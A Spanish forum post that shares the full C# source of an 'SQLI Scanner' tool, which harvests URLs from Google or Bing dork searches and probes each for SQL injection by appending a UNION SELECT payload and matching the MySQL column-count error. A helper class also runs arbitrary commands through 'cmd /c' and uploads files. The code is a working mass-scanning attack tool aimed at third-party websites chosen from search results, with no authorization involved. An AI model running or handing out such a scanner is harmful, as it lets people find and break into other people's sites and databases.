Un programa sencillo en C# para buscar páginas vulnerables a SQLi usando Google o Bing.
Una imagen :
(http://doddyhackman.webcindario.com/images/sqliscannercsharp.jpg)
Los códigos :
Form1.cs
// SQLI Scanner 0.4
// (C) Doddy Hackman 2014
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.IO;
using System.Text.RegularExpressions;
namespace SQLI_Scanner
{
public partial class Form1 : Form
{
/// <summary>
/// Creates the form and calls InitializeComponent(), which is defined in
/// another part of this partial class.
/// </summary>
public Form1()
{
InitializeComponent();
}
/// <summary>
/// Search button: sends the text of textBox1 (search term) and textBox2
/// (result count) to the engine named in comboBox1 and fills listBox1 with
/// the returned URLs.
/// </summary>
/// <param name="sender">Control that raised the event (unused).</param>
/// <param name="e">Event data (unused).</param>
private void button1_Click(object sender, EventArgs e)
{
    listBox1.Items.Clear();

    DH_Tools helper = new DH_Tools();
    funciones searcher = new funciones();

    toolStripStatusLabel1.Text = "[+] Searching ...";
    this.Refresh();

    // Any selection other than the literal "Bing" goes to the Google scraper.
    bool useBing = comboBox1.Text == "Bing";
    List<string> found = useBing
        ? searcher.bingsearch(textBox1.Text, textBox2.Text)
        : searcher.googlesearch(textBox1.Text, textBox2.Text);

    // cortar keeps only URLs with a "?name=" part; repes then drops duplicates.
    found = helper.repes(helper.cortar(found));

    foreach (string entry in found)
    {
        listBox1.Items.Add(entry);
    }

    if (listBox1.Items.Count == 0)
    {
        MessageBox.Show("Not Found");
    }

    toolStripStatusLabel1.Text = "[+] Search finished";
    this.Refresh();
}
/// <summary>
/// Scan button: requests every URL in listBox1 with a fixed UNION SELECT
/// suffix and adds to listBox2 (and to sqli-logs.txt) those whose response
/// contains MySQL's column-count error message.
/// </summary>
/// <param name="sender">Control that raised the event (unused).</param>
/// <param name="e">Event data (unused).</param>
private void button2_Click(object sender, EventArgs e)
{
    toolStripStatusLabel1.Text = "[+] Scanning ...";
    this.Refresh();
    listBox2.Items.Clear();

    DH_Tools helper = new DH_Tools();

    // Copy the list box contents into a plain list before looping.
    List<string> pending = new List<string>();
    foreach (object item in listBox1.Items)
    {
        pending.Add(item.ToString());
    }

    if (listBox1.Items.Count > 0)
    {
        foreach (string page in pending)
        {
            toolStripStatusLabel1.Text = "[+] Checking : " + page;
            this.Refresh();

            // The suffix is constant, so these requests are easy to spot in
            // web server access logs and simple to match in a filtering rule.
            string body = helper.toma(page + "-1+union+select+666--");

            // The check only succeeds when the server echoes the raw database
            // error to the client; a generic error page removes that signal.
            bool flagged = Regex.IsMatch(body, "The used SELECT statements have a different number of columns", RegexOptions.IgnoreCase);
            if (flagged)
            {
                listBox2.Items.Add(page);
                // savefile appends the text as given, with no line separator.
                helper.savefile("sqli-logs.txt", page);
            }
        }

        if (listBox2.Items.Count == 0)
        {
            MessageBox.Show("Not Found");
        }
    }
    else
    {
        MessageBox.Show("Not Found");
    }

    toolStripStatusLabel1.Text = "[+] Scan Finished";
    this.Refresh();
}
/// <summary>
/// Logs button: if sqli-logs.txt exists in the working directory, passes its
/// name to DH_Tools.console (which runs it through "cmd /c"); otherwise
/// reports that no log is available.
/// </summary>
/// <param name="sender">Control that raised the event (unused).</param>
/// <param name="e">Event data (unused).</param>
private void button3_Click(object sender, EventArgs e)
{
    if (!File.Exists("sqli-logs.txt"))
    {
        MessageBox.Show("Logs not found");
        return;
    }

    // The argument is a fixed file name, not user or network data.
    DH_Tools helper = new DH_Tools();
    helper.console("sqli-logs.txt");
}
/// <summary>
/// Exit button: ends the program by calling Application.Exit().
/// </summary>
private void button4_Click(object sender, EventArgs e)
{
Application.Exit();
}
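/// <summary>
/// Opens the double-clicked search result in the default browser.
/// </summary>
/// <remarks>
/// Entries in listBox1 come from scraped search-engine pages, so they are
/// untrusted text. They are validated as absolute http/https URLs and handed
/// to the OS shell association directly instead of being concatenated into a
/// "cmd /c start ..." command line, where characters such as &amp; or | would
/// be interpreted as additional commands on the local machine.
/// </remarks>
/// <param name="sender">Control that raised the event (unused).</param>
/// <param name="e">Event data (unused).</param>
private void listBox1_DoubleClick(object sender, EventArgs e)
{
    // SelectedItem is null when the double-click lands on an empty area.
    if (listBox1.SelectedItem == null)
    {
        return;
    }

    Uri target;
    bool parsed = Uri.TryCreate(listBox1.SelectedItem.ToString(), UriKind.Absolute, out target);
    if (!parsed || (target.Scheme != Uri.UriSchemeHttp && target.Scheme != Uri.UriSchemeHttps))
    {
        MessageBox.Show("Invalid URL");
        return;
    }

    try
    {
        // UseShellExecute opens the URL with its registered handler; no
        // command interpreter parses the string.
        System.Diagnostics.ProcessStartInfo launch = new System.Diagnostics.ProcessStartInfo(target.AbsoluteUri);
        launch.UseShellExecute = true;
        System.Diagnostics.Process.Start(launch);
    }
    catch (Exception)
    {
        MessageBox.Show("Could not open URL");
    }
}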
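/// <summary>
/// Opens the double-clicked scan result in the default browser.
/// </summary>
/// <remarks>
/// Entries in listBox2 originate from scraped search-engine pages, so they
/// are untrusted text. They are validated as absolute http/https URLs and
/// handed to the OS shell association directly instead of being concatenated
/// into a "cmd /c start ..." command line, where characters such as &amp; or |
/// would be interpreted as additional commands on the local machine.
/// </remarks>
/// <param name="sender">Control that raised the event (unused).</param>
/// <param name="e">Event data (unused).</param>
private void listBox2_DoubleClick(object sender, EventArgs e)
{
    // SelectedItem is null when the double-click lands on an empty area.
    if (listBox2.SelectedItem == null)
    {
        return;
    }

    Uri target;
    bool parsed = Uri.TryCreate(listBox2.SelectedItem.ToString(), UriKind.Absolute, out target);
    if (!parsed || (target.Scheme != Uri.UriSchemeHttp && target.Scheme != Uri.UriSchemeHttps))
    {
        MessageBox.Show("Invalid URL");
        return;
    }

    try
    {
        // UseShellExecute opens the URL with its registered handler; no
        // command interpreter parses the string.
        System.Diagnostics.ProcessStartInfo launch = new System.Diagnostics.ProcessStartInfo(target.AbsoluteUri);
        launch.UseShellExecute = true;
        System.Diagnostics.Process.Start(launch);
    }
    catch (Exception)
    {
        MessageBox.Show("Could not open URL");
    }
}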
}
}
// The End ?
funciones.cs
// Funciones para SQLI Scanner 0.4
// (C) Doddy Hackman 2014
using System;
using System.Collections.Generic;
using System.Text;
using System.Net;
using System.Text.RegularExpressions;
using System.Web;
namespace SQLI_Scanner
{
class funciones
{
/// <summary>
/// Downloads Bing result pages for <paramref name="dork"/> and returns every
/// result link truncated right after its first "=".
/// </summary>
/// <param name="dork">Search text; concatenated into the query string as-is, without URL-encoding.</param>
/// <param name="cantidad">Upper bound for the "first" offset, stepped in tens; must parse as Int16 or Convert.ToInt16 throws.</param>
/// <returns>The truncated links in page order; duplicates are not removed here.</returns>
public List<String> bingsearch(string dork, string cantidad)
{
    WebClient client = new WebClient();
    client.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";

    List<string> collected = new List<string>();

    // The bound is re-parsed on every pass, exactly as the loop condition is evaluated.
    for (Int16 offset = 10; offset <= Convert.ToInt16(cantidad); offset += 10)
    {
        string html = client.DownloadString("http://www.bing.com/search?q=" + dork + "&first=" + offset);

        foreach (Match link in Regex.Matches(html, "<h3><a href=\"(.*?)\"", RegexOptions.IgnoreCase))
        {
            // Keep only links that contain a parameter assignment.
            Match prefix = Regex.Match(link.Groups[1].Value, "(.*?)=(.*?)", RegexOptions.IgnoreCase);
            if (prefix.Success)
            {
                collected.Add(prefix.Groups[1].Value + "=");
            }
        }
    }

    return collected;
}
/// <summary>
/// Downloads Google result pages for <paramref name="dork"/> and returns the
/// result links, unwrapping the "/url?q=" redirect form when it is present.
/// </summary>
/// <param name="dork">Search text; concatenated into the query string as-is, without URL-encoding.</param>
/// <param name="paginas">Upper bound for the "start" offset, stepped in tens; must parse as Int16 or Convert.ToInt16 throws.</param>
/// <returns>The extracted links in page order; duplicates are not removed here.</returns>
public List<String> googlesearch(string dork, string paginas)
{
    WebClient client = new WebClient();
    client.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";

    List<string> collected = new List<string>();

    for (Int16 offset = 10; offset <= Convert.ToInt16(paginas); offset += 10)
    {
        string html = client.DownloadString("http://www.google.com/search?hl=&q=" + dork + "&start=" + offset);

        foreach (Match hit in Regex.Matches(html, "(?<=\"r\"><. href=\")(.+?)\"", RegexOptions.IgnoreCase))
        {
            string decoded = Uri.UnescapeDataString(hit.Groups[1].Value);

            // Redirect-style links carry the destination in the q parameter;
            // anything else is stored unchanged.
            Match redirect = Regex.Match(decoded, @"\/url\?q\=(.*?)\&\;", RegexOptions.IgnoreCase);
            collected.Add(redirect.Success ? redirect.Groups[1].Value : decoded);
        }
    }

    return collected;
}
}
}
// The End ?
DH_Tools.cs
// Class Name : DH Tools
// Version : Beta
// Author : Doddy Hackman
// (C) Doddy Hackman 2014
//
// Functions :
//
// [+] HTTP Methods GET & POST
// [+] Get HTTP Status code number
// [+] HTTP FingerPrinting
// [+] Read File
// [+] Write File
// [+] GET OS
// [+] Remove duplicates from a List
// [+] Cut urls from a List
// [+] Download
// [+] Upload
// [+] Get Basename from a path
// [+] Execute commands
// [+] URI Split
// [+] MD5 Hash Generator
// [+] Get MD5 of file
// [+] Get IP address from host name
//
// Credits :
//
// Method POST -> https://technet.rapaport.com/Info/Prices/SampleCode/Full_Example.aspx
// Method GET -> http://stackoverflow.com/questions/4510212/how-i-can-get-web-pages-content-and-save-it-into-the-string-variable
// HTTP Headers -> http://msdn.microsoft.com/en-us/library/system.net.httpwebresponse.headers%28v=vs.110%29.aspx
// List Cleaner -> http://forums.asp.net/t/1318899.aspx?Remove+duplicate+items+from+List+String+
// Execute command -> http://www.codeproject.com/Articles/25983/How-to-Execute-a-Command-in-C
// MD5 Hash Generator -> http://www.java2s.com/Code/CSharp/Security/GetandverifyMD5Hash.htm
// Get MD5 of file -> http://stackoverflow.com/questions/10520048/calculate-md5-checksum-for-a-file
//
// Thanks to : $DoC and atheros14 (Forum indetectables)
//
using System;
using System.Collections.Generic;
using System.Text;
using System.Net;
using System.IO;
using System.Text.RegularExpressions;
using System.Security.Cryptography;
namespace SQLI_Scanner
{
class DH_Tools
{
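/// <summary>
/// Performs an HTTP GET and returns the response body as text.
/// </summary>
/// <param name="url">Address to download.</param>
/// <returns>The body, or the empty string if the request fails for any reason.</returns>
public string toma(string url)
{
    try
    {
        // WebClient is IDisposable; release it as soon as the download ends.
        using (WebClient client = new WebClient())
        {
            client.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";
            return client.DownloadString(url);
        }
    }
    catch (Exception)
    {
        // Deliberate best-effort: every failure (bad URL, network error,
        // HTTP error status) is reported to the caller as "".
        return "";
    }
}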
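/// <summary>
/// Performs an HTTP POST with a form-urlencoded body and returns the
/// response body as text.
/// </summary>
/// <param name="url">Address to post to.</param>
/// <param name="par">Request body; encoded as ASCII, so non-ASCII characters are replaced by the encoder.</param>
/// <returns>The response body, or the empty string if anything fails.</returns>
public string tomar(string url, string par)
{
    try
    {
        // Encode once instead of twice (buffer and length).
        byte[] payload = Encoding.ASCII.GetBytes(par);

        HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
        request.UserAgent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";
        request.Method = "POST";
        request.ContentType = "application/x-www-form-urlencoded";

        using (Stream upload = request.GetRequestStream())
        {
            upload.Write(payload, 0, payload.Length);
        }

        // Dispose the response and reader so the connection is released even
        // when reading fails part-way.
        using (WebResponse response = request.GetResponse())
        using (StreamReader reader = new StreamReader(response.GetResponseStream()))
        {
            return reader.ReadToEnd();
        }
    }
    catch (Exception)
    {
        // Deliberate best-effort: every failure is reported as "".
        return "";
    }
}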
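/// <summary>
/// Requests <paramref name="url"/> and returns the numeric HTTP status code
/// as a string.
/// </summary>
/// <param name="url">Address to request.</param>
/// <returns>
/// The status code of the response. When no HTTP response is available at
/// all (bad URL, connection failure) the historical fallback "404" is kept.
/// </returns>
public string respondecode(string url)
{
    try
    {
        HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
        request.UserAgent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";

        // Dispose the response so the underlying connection is released.
        using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
        {
            return Convert.ToString((int)response.StatusCode);
        }
    }
    catch (WebException ex)
    {
        // GetResponse throws for error statuses; the real code (403, 500, ...)
        // is carried on the exception instead of being reported as 404.
        using (HttpWebResponse failed = ex.Response as HttpWebResponse)
        {
            return failed != null ? Convert.ToString((int)failed.StatusCode) : "404";
        }
    }
    catch (Exception)
    {
        return "404";
    }
}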
/// <summary>
/// Requests <paramref name="url"/> and returns its response headers, one
/// "[+] name:value" line per header.
/// </summary>
/// <param name="url">Address to request.</param>
/// <returns>The formatted header list; whatever was collected before a failure (possibly "") if an exception occurs.</returns>
public string httpfinger(string url)
{
    StringBuilder report = new StringBuilder();
    try
    {
        HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
        HttpWebResponse response = (HttpWebResponse)request.GetResponse();

        for (int index = 0; index != response.Headers.Count; index++)
        {
            report.Append("[+] ")
                  .Append(response.Headers.Keys[index])
                  .Append(":")
                  .Append(response.Headers[index])
                  .Append(Environment.NewLine);
        }

        response.Close();
    }
    catch
    {
        // Failures are swallowed; the caller only sees the text gathered so far.
    }
    return report.ToString();
}
/// <summary>
/// Reads a whole file as text.
/// </summary>
/// <param name="file">Path of the file to read.</param>
/// <returns>The file contents, or the empty string if the file cannot be read.</returns>
public string openword(string file)
{
    try
    {
        return File.ReadAllText(file);
    }
    catch
    {
        // Missing file, bad path and access errors all map to "".
        return "";
    }
}
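/// <summary>
/// Appends text to a file, creating the file if it does not exist.
/// </summary>
/// <param name="file">Path of the file to append to.</param>
/// <param name="texto">Text to append; written as-is, with no line separator added.</param>
public void savefile(string file, string texto)
{
    try
    {
        // "using" closes the handle even when Write throws, so the file is
        // not left locked after a failed write.
        using (StreamWriter writer = new StreamWriter(file, true))
        {
            writer.Write(texto);
        }
    }
    catch (Exception)
    {
        // Deliberate best-effort: write failures are not reported to the caller.
    }
}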
/// <summary>
/// Returns the string form of Environment.OSVersion.
/// </summary>
/// <returns>The operating system description, or "?" if it cannot be obtained.</returns>
public string getos()
{
    try
    {
        return Environment.OSVersion.ToString();
    }
    catch
    {
        return "?";
    }
}
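/// <summary>
/// Returns the distinct entries of a list, keeping the first occurrence of
/// each and the original order.
/// </summary>
/// <param name="array">Input list; null is treated as an empty list.</param>
/// <returns>A new list without duplicates (ordinal, case-sensitive comparison).</returns>
public List<string> repes(List<string> array)
{
    List<string> unique = new List<string>();
    if (array == null)
    {
        return unique;
    }

    // A set gives constant-time membership checks; List.Contains inside the
    // loop made the whole pass quadratic in the number of URLs.
    HashSet<string> seen = new HashSet<string>();
    foreach (string item in array)
    {
        if (seen.Add(item))
        {
            unique.Add(item);
        }
    }
    return unique;
}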
/// <summary>
/// Keeps the URLs that contain a "?name=value" part and cuts each one right
/// after the last "=", dropping the final value.
/// </summary>
/// <param name="otroarray">URLs to filter.</param>
/// <returns>A new list with the truncated URLs; entries without "?...=" are omitted.</returns>
public List<string> cortar(List<string> otroarray)
{
    // Both leading groups are greedy: group 1 ends at the last "?",
    // group 2 at the last "=" after it.
    Regex queryShape = new Regex(@"(.*)\?(.*)=(.*)", RegexOptions.IgnoreCase);

    List<string> trimmed = new List<string>();
    foreach (string candidate in otroarray)
    {
        Match parts = queryShape.Match(candidate);
        if (!parts.Success)
        {
            continue;
        }
        trimmed.Add(string.Concat(parts.Groups[1].Value, "?", parts.Groups[2].Value, "="));
    }
    return trimmed;
}
/// <summary>
/// Downloads <paramref name="url"/> to the local file <paramref name="savename"/>.
/// </summary>
/// <param name="url">Address to download.</param>
/// <param name="savename">Destination path on disk.</param>
/// <returns>"OK" on success, "Error" if the download throws.</returns>
public string download(string url, string savename)
{
    WebClient client = new WebClient();
    client.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";

    try
    {
        client.DownloadFile(url, savename);
    }
    catch
    {
        return "Error";
    }
    return "OK";
}
/// <summary>
/// Uploads a local file with an HTTP POST and returns the server's reply.
/// </summary>
/// <param name="link">Address to post the file to.</param>
/// <param name="archivo">Path of the local file to send.</param>
/// <returns>The response body decoded as UTF-8, or "Error" if the upload throws.</returns>
public string upload(string link, string archivo)
{
    try
    {
        WebClient client = new WebClient();
        client.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";

        byte[] reply = client.UploadFile(link, "POST", archivo);
        return Encoding.UTF8.GetString(reply);
    }
    catch
    {
        return "Error";
    }
}
/// <summary>
/// Returns the file-name part of a path, as reported by FileInfo.Name.
/// </summary>
/// <param name="file">Path to inspect; FileInfo throws on null or malformed paths.</param>
/// <returns>The last path component.</returns>
public string basename(string file)
{
    return new FileInfo(file).Name;
}
/// <summary>
/// Runs a command line through "cmd /c" with no window and returns what it
/// wrote to standard output.
/// </summary>
/// <remarks>
/// <paramref name="cmd"/> is appended to "/c " verbatim, so every shell
/// metacharacter in it (&amp;, |, redirections) is interpreted by cmd.
/// Callers must only pass text they built themselves; values read from the
/// network or from user input need validation before they reach this method.
/// </remarks>
/// <param name="cmd">Command line to execute.</param>
/// <returns>The captured standard output, or "Error" if the process cannot be started or read.</returns>
public string console(string cmd)
{
    try
    {
        System.Diagnostics.Process shell = new System.Diagnostics.Process();
        shell.StartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + cmd)
        {
            RedirectStandardOutput = true,
            UseShellExecute = false,
            CreateNoWindow = true
        };
        shell.Start();

        // Reading to the end blocks until the child closes its output stream.
        return shell.StandardOutput.ReadToEnd();
    }
    catch
    {
        return "Error";
    }
}
/// <summary>
/// Returns one component of a URL.
/// </summary>
/// <param name="url">Absolute URL to parse; the Uri constructor throws if it is invalid.</param>
/// <param name="opcion">Component name: "host", "port", "path", "file" or "query".</param>
/// <returns>
/// The requested component; "Error" when <paramref name="opcion"/> is the
/// empty string, and "" for any other unrecognised value.
/// </returns>
public string urisplit(string url, string opcion)
{
    Uri parsed = new Uri(url);

    switch (opcion)
    {
        case "host":
            return parsed.Host;
        case "port":
            return Convert.ToString(parsed.Port);
        case "path":
            return parsed.LocalPath;
        case "file":
            // Last segment of the URL path, taken through FileInfo.
            return new FileInfo(parsed.AbsolutePath).Name;
        case "query":
            return parsed.Query;
        case "":
            return "Error";
        default:
            return "";
    }
}
/// <summary>
/// Returns the MD5 digest of a string as 32 lowercase hexadecimal characters.
/// </summary>
/// <remarks>
/// The text is converted to bytes with Encoding.Default, so non-ASCII input
/// can hash differently on machines with different default encodings.
/// MD5 is not collision-resistant; use it for checksums only, never for
/// password storage or as an integrity check against tampering.
/// </remarks>
/// <param name="text">Text to hash.</param>
/// <returns>The hexadecimal digest.</returns>
public string convertir_md5(string text)
{
    byte[] digest = MD5.Create().ComputeHash(Encoding.Default.GetBytes(text));
    return BitConverter.ToString(digest).Replace("-", "").ToLowerInvariant();
}
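/// <summary>
/// Returns the MD5 digest of a file's contents as lowercase hexadecimal.
/// </summary>
/// <remarks>
/// MD5 is adequate for detecting accidental corruption only; it does not
/// protect against a deliberately crafted file with the same digest.
/// </remarks>
/// <param name="file">Path of the file to hash.</param>
/// <returns>The hexadecimal digest, or "Error" if the file cannot be read.</returns>
public string md5file(string file)
{
    try
    {
        // Both objects are disposed on exit; the stream in particular was
        // previously left open, keeping the file locked until finalization.
        using (MD5 hasher = MD5.Create())
        using (FileStream input = File.OpenRead(file))
        {
            return BitConverter.ToString(hasher.ComputeHash(input)).Replace("-", "").ToLowerInvariant();
        }
    }
    catch (Exception)
    {
        return "Error";
    }
}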
/// <summary>
/// Resolves a host name and returns the first address found.
/// </summary>
/// <param name="host">Host name or IP address literal.</param>
/// <returns>The first resolved address as text, or "Error" if resolution fails or returns nothing.</returns>
public string getip(string host)
{
    try
    {
        return Dns.GetHostAddresses(host)[0].ToString();
    }
    catch
    {
        return "Error";
    }
}
}
}
// The End ?
Si lo quieren bajar, lo pueden hacer desde acá (https://sourceforge.net/projects/sqliscanner/).